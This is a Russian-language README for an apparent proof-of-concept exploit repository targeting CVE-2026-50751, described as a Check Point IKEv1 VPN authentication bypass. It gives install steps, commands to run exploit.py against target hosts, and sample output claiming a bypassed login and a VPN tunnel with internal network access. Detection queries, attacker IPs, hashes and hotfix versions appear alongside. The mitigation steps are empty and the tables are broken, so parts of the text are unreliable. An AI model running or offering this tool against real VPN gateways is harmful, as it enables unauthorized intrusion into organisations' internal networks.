
Уязвимость: слабость логики потока в удаленном доступе и мобильном доступе
Этот код ТОЛЬКО для образовательных целей и авторизованных тестов безопасности. Неавторизованное использование против систем без явного разрешения НЕЗАКОННО. Автор не несет ответственности за неправильное использование этого инструмента.
CVE-2026-50751 — это критическая уязвимость обхода аутентификации в протоколе IKEv1 (устаревший) от Check Point, затрагивающая Remote Access VPN и Mobile Access. Неаутентифицированный злоумышленник может использовать ошибку в проверке сертификатов для установки VPN-соединения без необходимости в действующем пароле.
| Продукт | Версии |
|---|---|
| Security Gateways | R80.40 - R82.10 с включенным IKEv1 |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | Все версии с IKEv1 |
# Клонировать репозиторий
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC
# Установить зависимости
pip install -r requirements.txt
# Дать права на выполнение
chmod +x exploit.py
📦 Зависимости
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
# Обнаружить, включен ли IKEv1
python3 detector.py -t 192.168.1.1 -p 500
# Быстрое сканирование
python3 detector.py -t vpn.target.com -p 4500
# Выполнить обход аутентификации
python3 exploit.py -t 192.168.1.1 -p 500
# С указанием интерфейса
python3 exploit.py -t vpn.target.com --interface eth0
# Подробный режим
python3 exploit.py -t 192.168.1.1 -p 500 -v
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║
║ Critical VPN Authentication Bypass Exploit ║
║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║
╚═══════════════════════════════════════════════════════════════╝
[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available
[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
# Запрос для обнаружения злоумышленников
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
| Тип | Значение |
|---|---|
| IP-адреса злоумышленников | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 |
| Хеши | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |
| Версия | Номер Hotfix |
|---|
Отключить устаревшие клиенты:
Принудительно использовать только IKEv2:
Сделать обязательным машинный сертификат:
| Дата | Событие |
|---|---|
| 2026-05-07 | Первая эксплуатация зафиксирована |
| 2026-06-04 | Check Point начинает расследование |
| 2026-06-08 | CVE опубликован, CISA добавляет в KEV |
| 2026-06-11 | Крайний срок CISA для исправления |
Это программное обеспечение предоставляется «как есть», без каких-либо гарантий. Автор не несет ответственности за неправомерное использование этого инструмента. Используйте его только на системах, которыми вы владеете или имеете явное разрешение на тестирование.
Для сообщения об ошибках или внесения вклада:
⭐ Если этот PoC был вам полезен, поставьте звезду репозиторию
📦 requirements.txt
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
⚠️ Важное примечание для GitHub:
| Ссылка |
|---|
| R82.10 | Take 19 | Скачать |
| R82 | Take 103 | Скачать |
| R81.20 | Take 141 | Скачать |